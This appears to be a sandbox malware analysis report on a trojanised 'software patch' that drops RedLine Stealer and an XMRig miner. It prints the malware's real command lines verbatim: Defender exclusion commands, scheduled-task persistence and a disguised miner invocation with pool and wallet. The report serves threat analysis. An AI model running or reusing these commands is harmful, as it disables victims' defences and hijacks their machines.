Analysis
-
max time kernel
151s -
max time network
170s -
platform
windows7_x64 -
resource
win7-en-20210920 -
submitted
28-10-2021 16:15
Static task
static1
Behavioral task
behavioral1
Sample
Software patch by Silensix.exe
Resource
win7-en-20210920
General
-
Target
Software patch by Silensix.exe
-
Size
3.0MB
-
MD5
1f1d67844ed54e1f03355f57ba8b17fc
-
SHA1
248262da44662b7347ff6de745ac498ca7984e88
-
SHA256
f2f1cba015211deb613359de61bc4bed08c9ccf1af7b9af89d73aaa1f4da6d42
-
SHA512
9714f8fbd1533b54f4fbff6da24ba322e6f49ac47bc1a83d336424fb31cbd0f6b0bff8139f4ca9a13706593fbe288f89a9f74103a364fd56e13869dc32bde73d
Malware Config
Extracted
redline
Youtube
185.203.240.16:1249
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 5 IoCs
Processes:
resource yara_rule behavioral1/memory/1544-80-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral1/memory/1544-81-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral1/memory/1544-82-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral1/memory/1544-83-0x0000000000418D32-mapping.dmp family_redline behavioral1/memory/1544-85-0x0000000000400000-0x0000000000420000-memory.dmp family_redline -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
XMRig Miner Payload 12 IoCs
Processes:
resource yara_rule behavioral1/memory/1604-223-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1604-226-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1604-227-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1604-228-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1604-219-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1604-229-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1604-230-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1604-231-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1604-232-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1604-233-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1604-234-0x000000014030F3F8-mapping.dmp xmrig behavioral1/memory/1604-236-0x0000000140000000-0x0000000140786000-memory.dmp xmrig -
Downloads MZ/PE file
-
Executes dropped EXE 8 IoCs
Processes:
Datafile32.exeDatafile64.exeServer32.exeServer32.exeservices32.exeservices64.exesihost32.exesihost64.exepid process 1752 Datafile32.exe 1668 Datafile64.exe 1396 Server32.exe 1544 Server32.exe 1696 services32.exe 1028 services64.exe 1020 sihost32.exe 1180 sihost64.exe -
Checks BIOS information in registry 2 TTPs 6 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
Software patch by Silensix.exeDatafile64.exeservices64.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Software patch by Silensix.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Software patch by Silensix.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Datafile64.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Datafile64.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion services64.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion services64.exe -
Loads dropped DLL 12 IoCs
Processes:
Software patch by Silensix.exeServer32.execmd.execmd.execonhost.execonhost.exepid process 1616 Software patch by Silensix.exe 1616 Software patch by Silensix.exe 1616 Software patch by Silensix.exe 1616 Software patch by Silensix.exe 1616 Software patch by Silensix.exe 1396 Server32.exe 1724 cmd.exe 1724 cmd.exe 1476 cmd.exe 1964 conhost.exe 1964 conhost.exe 1272 conhost.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule behavioral1/memory/1616-57-0x0000000000C50000-0x0000000000C51000-memory.dmp themida \Users\Admin\AppData\Local\Temp\Datafile64.exe themida C:\Users\Admin\AppData\Local\Temp\Datafile64.exe themida behavioral1/memory/1668-75-0x0000000000400000-0x0000000000EAE000-memory.dmp themida C:\Users\Admin\AppData\Local\Temp\Datafile64.exe themida \Windows\System32\services64.exe themida C:\Windows\System32\services64.exe themida behavioral1/memory/1028-155-0x0000000000400000-0x0000000000EAE000-memory.dmp themida C:\Windows\system32\services64.exe themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
Software patch by Silensix.exeDatafile64.exeservices64.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Software patch by Silensix.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Datafile64.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA services64.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Drops file in System32 directory 12 IoCs
Processes:
powershell.execonhost.exepowershell.execonhost.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File created C:\Windows\system32\services64.exe conhost.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File created C:\Windows\system32\Microsoft\Libs\sihost64.exe conhost.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File created C:\Windows\system32\Microsoft\Libs\WR64.sys conhost.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\system32\services64.exe conhost.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
Processes:
Software patch by Silensix.exeDatafile64.exeservices64.exepid process 1616 Software patch by Silensix.exe 1668 Datafile64.exe 1028 services64.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
Server32.execonhost.exedescription pid process target process PID 1396 set thread context of 1544 1396 Server32.exe Server32.exe PID 1272 set thread context of 1604 1272 conhost.exe nslookup.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 1836 schtasks.exe 1480 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 36 IoCs
Processes:
Server32.execonhost.exepowershell.exepowershell.execonhost.exepowershell.exepowershell.execonhost.exepowershell.exepowershell.execonhost.exepowershell.exepowershell.exenslookup.exepid process 1544 Server32.exe 1932 conhost.exe 1756 powershell.exe 1812 powershell.exe 1840 conhost.exe 1500 powershell.exe 1176 powershell.exe 1964 conhost.exe 1964 conhost.exe 1172 powershell.exe 1568 powershell.exe 1272 conhost.exe 1272 conhost.exe 1756 powershell.exe 1404 powershell.exe 1604 nslookup.exe 1604 nslookup.exe 1604 nslookup.exe 1604 nslookup.exe 1604 nslookup.exe 1604 nslookup.exe 1604 nslookup.exe 1604 nslookup.exe 1604 nslookup.exe 1604 nslookup.exe 1604 nslookup.exe 1604 nslookup.exe 1604 nslookup.exe 1604 nslookup.exe 1604 nslookup.exe 1604 nslookup.exe 1604 nslookup.exe 1604 nslookup.exe 1604 nslookup.exe 1604 nslookup.exe 1604 nslookup.exe -
Suspicious use of AdjustPrivilegeToken 16 IoCs
Processes:
Software patch by Silensix.exeServer32.execonhost.exepowershell.exepowershell.execonhost.exepowershell.exepowershell.execonhost.exepowershell.exepowershell.execonhost.exepowershell.exepowershell.exenslookup.exedescription pid process Token: SeDebugPrivilege 1616 Software patch by Silensix.exe Token: SeDebugPrivilege 1544 Server32.exe Token: SeDebugPrivilege 1932 conhost.exe Token: SeDebugPrivilege 1756 powershell.exe Token: SeDebugPrivilege 1812 powershell.exe Token: SeDebugPrivilege 1840 conhost.exe Token: SeDebugPrivilege 1500 powershell.exe Token: SeDebugPrivilege 1176 powershell.exe Token: SeDebugPrivilege 1964 conhost.exe Token: SeDebugPrivilege 1172 powershell.exe Token: SeDebugPrivilege 1568 powershell.exe Token: SeDebugPrivilege 1272 conhost.exe Token: SeDebugPrivilege 1756 powershell.exe Token: SeDebugPrivilege 1404 powershell.exe Token: SeLockMemoryPrivilege 1604 nslookup.exe Token: SeLockMemoryPrivilege 1604 nslookup.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Software patch by Silensix.exeServer32.exeDatafile32.execonhost.execmd.execmd.exeDatafile64.execonhost.execmd.execmd.execmd.exedescription pid process target process PID 1616 wrote to memory of 1752 1616 Software patch by Silensix.exe Datafile32.exe PID 1616 wrote to memory of 1752 1616 Software patch by Silensix.exe Datafile32.exe PID 1616 wrote to memory of 1752 1616 Software patch by Silensix.exe Datafile32.exe PID 1616 wrote to memory of 1752 1616 Software patch by Silensix.exe Datafile32.exe PID 1616 wrote to memory of 1668 1616 Software patch by Silensix.exe Datafile64.exe PID 1616 wrote to memory of 1668 1616 Software patch by Silensix.exe Datafile64.exe PID 1616 wrote to memory of 1668 1616 Software patch by Silensix.exe Datafile64.exe PID 1616 wrote to memory of 1668 1616 Software patch by Silensix.exe Datafile64.exe PID 1616 wrote to memory of 1396 1616 Software patch by Silensix.exe Server32.exe PID 1616 wrote to memory of 1396 1616 Software patch by Silensix.exe Server32.exe PID 1616 wrote to memory of 1396 1616 Software patch by Silensix.exe Server32.exe PID 1616 wrote to memory of 1396 1616 Software patch by Silensix.exe Server32.exe PID 1396 wrote to memory of 1544 1396 Server32.exe Server32.exe PID 1396 wrote to memory of 1544 1396 Server32.exe Server32.exe PID 1396 wrote to memory of 1544 1396 Server32.exe Server32.exe PID 1396 wrote to memory of 1544 1396 Server32.exe Server32.exe PID 1396 wrote to memory of 1544 1396 Server32.exe Server32.exe PID 1396 wrote to memory of 1544 1396 Server32.exe Server32.exe PID 1396 wrote to memory of 1544 1396 Server32.exe Server32.exe PID 1396 wrote to memory of 1544 1396 Server32.exe Server32.exe PID 1396 wrote to memory of 1544 1396 Server32.exe Server32.exe PID 1752 wrote to memory of 1932 1752 Datafile32.exe conhost.exe PID 1752 wrote to memory of 1932 1752 Datafile32.exe conhost.exe PID 1752 wrote to memory of 1932 1752 Datafile32.exe conhost.exe PID 1752 wrote to memory of 1932 1752 Datafile32.exe conhost.exe PID 1932 wrote to memory of 964 1932 conhost.exe cmd.exe PID 1932 wrote to memory of 964 1932 conhost.exe cmd.exe PID 1932 wrote to memory of 964 1932 conhost.exe cmd.exe PID 964 wrote to memory of 1756 964 cmd.exe powershell.exe PID 964 wrote to memory of 1756 964 cmd.exe powershell.exe PID 964 wrote to memory of 1756 964 cmd.exe powershell.exe PID 1932 wrote to memory of 1596 1932 conhost.exe cmd.exe PID 1932 wrote to memory of 1596 1932 conhost.exe cmd.exe PID 1932 wrote to memory of 1596 1932 conhost.exe cmd.exe PID 1596 wrote to memory of 1836 1596 cmd.exe schtasks.exe PID 1596 wrote to memory of 1836 1596 cmd.exe schtasks.exe PID 1596 wrote to memory of 1836 1596 cmd.exe schtasks.exe PID 964 wrote to memory of 1812 964 cmd.exe powershell.exe PID 964 wrote to memory of 1812 964 cmd.exe powershell.exe PID 964 wrote to memory of 1812 964 cmd.exe powershell.exe PID 1668 wrote to memory of 1840 1668 Datafile64.exe conhost.exe PID 1668 wrote to memory of 1840 1668 Datafile64.exe conhost.exe PID 1668 wrote to memory of 1840 1668 Datafile64.exe conhost.exe PID 1668 wrote to memory of 1840 1668 Datafile64.exe conhost.exe PID 1840 wrote to memory of 1980 1840 conhost.exe cmd.exe PID 1840 wrote to memory of 1980 1840 conhost.exe cmd.exe PID 1840 wrote to memory of 1980 1840 conhost.exe cmd.exe PID 1980 wrote to memory of 1500 1980 cmd.exe powershell.exe PID 1980 wrote to memory of 1500 1980 cmd.exe powershell.exe PID 1980 wrote to memory of 1500 1980 cmd.exe powershell.exe PID 1840 wrote to memory of 1896 1840 conhost.exe cmd.exe PID 1840 wrote to memory of 1896 1840 conhost.exe cmd.exe PID 1840 wrote to memory of 1896 1840 conhost.exe cmd.exe PID 1896 wrote to memory of 1480 1896 cmd.exe schtasks.exe PID 1896 wrote to memory of 1480 1896 cmd.exe schtasks.exe PID 1896 wrote to memory of 1480 1896 cmd.exe schtasks.exe PID 1932 wrote to memory of 1724 1932 conhost.exe cmd.exe PID 1932 wrote to memory of 1724 1932 conhost.exe cmd.exe PID 1932 wrote to memory of 1724 1932 conhost.exe cmd.exe PID 1980 wrote to memory of 1176 1980 cmd.exe powershell.exe PID 1980 wrote to memory of 1176 1980 cmd.exe powershell.exe PID 1980 wrote to memory of 1176 1980 cmd.exe powershell.exe PID 1724 wrote to memory of 1696 1724 cmd.exe services32.exe PID 1724 wrote to memory of 1696 1724 cmd.exe services32.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Software patch by Silensix.exe"C:\Users\Admin\AppData\Local\Temp\Software patch by Silensix.exe"1⤵
- Checks BIOS information in registry
- Loads dropped DLL
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Datafile32.exe"C:\Users\Admin\AppData\Local\Temp\Datafile32.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Datafile32.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Users\Admin\services32.exe"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Users\Admin\services32.exe"5⤵
- Creates scheduled task(s)
-
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Users\Admin\services32.exe"4⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\services32.exeC:\Users\Admin\services32.exe5⤵
- Executes dropped EXE
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\\conhost.exe" "C:\Users\Admin\services32.exe"6⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit7⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"8⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"8⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"7⤵
- Executes dropped EXE
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\\conhost.exe" "/sihost32"8⤵
-
C:\Users\Admin\AppData\Local\Temp\Datafile64.exe"C:\Users\Admin\AppData\Local\Temp\Datafile64.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Datafile64.exe"3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"5⤵
- Creates scheduled task(s)
-
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Windows\system32\services64.exe"4⤵
- Loads dropped DLL
-
C:\Windows\system32\services64.exeC:\Windows\system32\services64.exe5⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Windows\system32\services64.exe"6⤵
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit7⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"8⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"8⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\Microsoft\Libs\sihost64.exe"C:\Windows\system32\Microsoft\Libs\sihost64.exe"7⤵
- Executes dropped EXE
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "/sihost64"8⤵
-
C:\Windows\System32\nslookup.exeC:\Windows/System32\nslookup.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=459jfEXyVheN7bBBRJPjJY7jH8nCKFZKdZrBcyPK6q4b7mQnrxN3sSmU8wAcuVvMxP6sumE9x28XSRCgLgyBvT4VENVJbTQ --pass= --cpu-max-threads-hint=50 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6NiP86mD8cW+f6jtmqjmEDLY00XM3Bo2fOksM1LJ6Dgf" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56GQTOYuXRCBeyb5NYlmdCuiwuvmEFRE3FUoytGa2xDRKVyTGVqBRZ3YvrseaWnYy0OhLuczKVxfo8Wo33kvDh26CIpmy6+bf50YCXxhpkDvay12RqWFwTrEWzJDjMOFSbV4qSudJZDKeejGmt2wAsK4zZ9lj0F0NMeagNs9oiluuddfhHuwfN3JDOsm7vnmpSFDvtwzZIXsZWyWN624JxJsSIqBQxfKrcCnHvRx/k2yLSlvxLvum+3cwztr7Zb0wO7EEWrafJMkNolCTGr1RQK9klv+u1q+LOMUOW+Y1mA+ZjeC+aSi9qmt59ZMlAX42foDzL1w8qyVjl6rfhEF/2bTP0YCyKockkTlSVngGY/1F1T5EOo9DhmrxyNy9y8mJqRKYUIcpgNI5Y4F/BBh3W0pw0+6w6pKB/o2s/ADQ0m7f1mIWwiXrj/GHg6M2kw4tg4mnBGVnha642JDqV8iaYphm4FpsNVwyEeLSXd18Mjr+kd9fvE08ohpB15bbg+6JPSeWISk8CHiep3TzEvyvZ+5XcHZVh1iXXZwlYO+wW5wxnobnzBzuj6f/BZ2txWK+7m4Cgd8mjMym7jJ/vKH1WIDSz05jpx4+wkdqzn3YIdvl2S8Luc4rG0CJXqJOdwbYOBrAey4VzJk8E8cY9tmMr5hpjLcfmu59CVDYVbbFFkb9usjHhXda167RDDOeCiLgdiepY0+9J4GWfDFBWRnvZEIn9njCW10s1hFXvQH+unnKdsaoBPNxSaPInK8O97Hj64jPqNG5qPd3DSjbVR1Cvuh9P29ZftnsNS50GnGtYvaNRBa6443D9MamN7WKSEjXwi5X466GHpLm7tClAm3T8zHW8BSKHq3yutkuduzGC2BYW5rxa17LYp4CzfKufpZJNPcoGIEVeut/xrvPPi+IYNCKrJPaDMN2ZJkpVGMqbuc5AF89xn8L6Lg1pYhaW8QjVZfQAkz7FVC8K667Gg6noLQpAyfd6lW36v4zbzg+fy82rNQmYSI3WMfiYNmvJM8DVc0772kBqEwUisr6ktdw4QlqXJe45Hvgu4yC2Rb6/ntnmOTLJz66c2h/wdUSvS18C67j6jsTvSh7k7avmCdG4sgS/BcyNsYOGIVjgNICoikSjNVrnFxCscaJerBnNPv197mrO4+rRF20+jzVnXKaNAmzbmoa4UjU13WSWasSDIT/HLOYsB6MqZ9V7F19H0MAEc0HL5dHX6oXKZkVMPa+PCA=" --cinit-idle-wait=5 --cinit-idle-cpu=80 --cinit-stealth7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\Server32.exe"C:\Users\Admin\AppData\Local\Temp\Server32.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Server32.exeC:\Users\Admin\AppData\Local\Temp\Server32.exe3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015MD5
ab5c36d10261c173c5896f3478cdc6b7
SHA187ac53810ad125663519e944bc87ded3979cbee4
SHA256f8e90fb0557fe49d7702cfb506312ac0b24c97802f9c782696db6d47f434e8e9
SHA512e83e4eae44e7a9cbcd267dbfc25a7f4f68b50591e3bbe267324b1f813c9220d565b284994ded5f7d2d371d50e1ebfa647176ec8de9716f754c6b5785c6e897fa
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015MD5
6aa755a57762e3c5bae964ff788bd1a7
SHA17f0486cdf9246f0bccdd05def3f26e88c9678b44
SHA256437a350050a0b4977d21d464ed5b43f33e6b07c576697e83466ce4688b126ac2
SHA51259bff44d7ca17fd67809c3eeb297f8ecb453da1cf984238fb96187fd8876e70ad2d7af1758b8119b068b000d3930162a975c31760a717de946e8dfbe64b3a005
-
C:\Users\Admin\AppData\Local\Temp\Datafile32.exeMD5
55f246c4f670bddc2e1c6fab66fb9af8
SHA1b2737bf54e19008f7230830c987e9cc45ca9dba7
SHA2564c8b5fba12ebb583a444831e1a9759ef724f2d9f37c595e8afb22dbbdabf6bc8
SHA512c124240ded2271bc125e88ea6f4cc4625915809a13d66ebf8c32677436f043340b92bc50283835d212c9b40edcea5d458c2663a1d5be5038154b1eb1560628fe
-
C:\Users\Admin\AppData\Local\Temp\Datafile32.exeMD5
55f246c4f670bddc2e1c6fab66fb9af8
SHA1b2737bf54e19008f7230830c987e9cc45ca9dba7
SHA2564c8b5fba12ebb583a444831e1a9759ef724f2d9f37c595e8afb22dbbdabf6bc8
SHA512c124240ded2271bc125e88ea6f4cc4625915809a13d66ebf8c32677436f043340b92bc50283835d212c9b40edcea5d458c2663a1d5be5038154b1eb1560628fe
-
C:\Users\Admin\AppData\Local\Temp\Datafile64.exeMD5
f87ec0d92f1e1c57e281c3b7207264a4
SHA1452ee705af24c36bb2235fc969dd122ede448e7b
SHA2565e5c5c47ac45012b8fe6c40877d111d17b1ae3108fb1bb6ff4ab6e154d256f1c
SHA5128e141c0a78dadafc241a70b1298fd35e223c18eaecceb7ea17bba05c4626e40e5c578757e0510a4db23f99dfb7439371f2ec6fe25252c50f4e3e89b30be37052
-
C:\Users\Admin\AppData\Local\Temp\Datafile64.exeMD5
f87ec0d92f1e1c57e281c3b7207264a4
SHA1452ee705af24c36bb2235fc969dd122ede448e7b
SHA2565e5c5c47ac45012b8fe6c40877d111d17b1ae3108fb1bb6ff4ab6e154d256f1c
SHA5128e141c0a78dadafc241a70b1298fd35e223c18eaecceb7ea17bba05c4626e40e5c578757e0510a4db23f99dfb7439371f2ec6fe25252c50f4e3e89b30be37052
-
C:\Users\Admin\AppData\Local\Temp\Server32.exeMD5
28df282142e714ecdf4bf289ba6dff99
SHA12c864ec9a55d1454b5260a1f31d4e21e586c24fc
SHA2560c18d8cdda403affefb632137b7308a178f0c1d60818285a1d98436ab6f394fd
SHA5120178748243957b1f531dbb9dacbed6f9b1b19abcb7a00baebea73843c7d8a36bad99add5f727c99e7f7320dd0a73a0de7544a2af68589d4f5244b471e62764b8
-
C:\Users\Admin\AppData\Local\Temp\Server32.exeMD5
28df282142e714ecdf4bf289ba6dff99
SHA12c864ec9a55d1454b5260a1f31d4e21e586c24fc
SHA2560c18d8cdda403affefb632137b7308a178f0c1d60818285a1d98436ab6f394fd
SHA5120178748243957b1f531dbb9dacbed6f9b1b19abcb7a00baebea73843c7d8a36bad99add5f727c99e7f7320dd0a73a0de7544a2af68589d4f5244b471e62764b8
-
C:\Users\Admin\AppData\Local\Temp\Server32.exeMD5
28df282142e714ecdf4bf289ba6dff99
SHA12c864ec9a55d1454b5260a1f31d4e21e586c24fc
SHA2560c18d8cdda403affefb632137b7308a178f0c1d60818285a1d98436ab6f394fd
SHA5120178748243957b1f531dbb9dacbed6f9b1b19abcb7a00baebea73843c7d8a36bad99add5f727c99e7f7320dd0a73a0de7544a2af68589d4f5244b471e62764b8
-
C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exeMD5
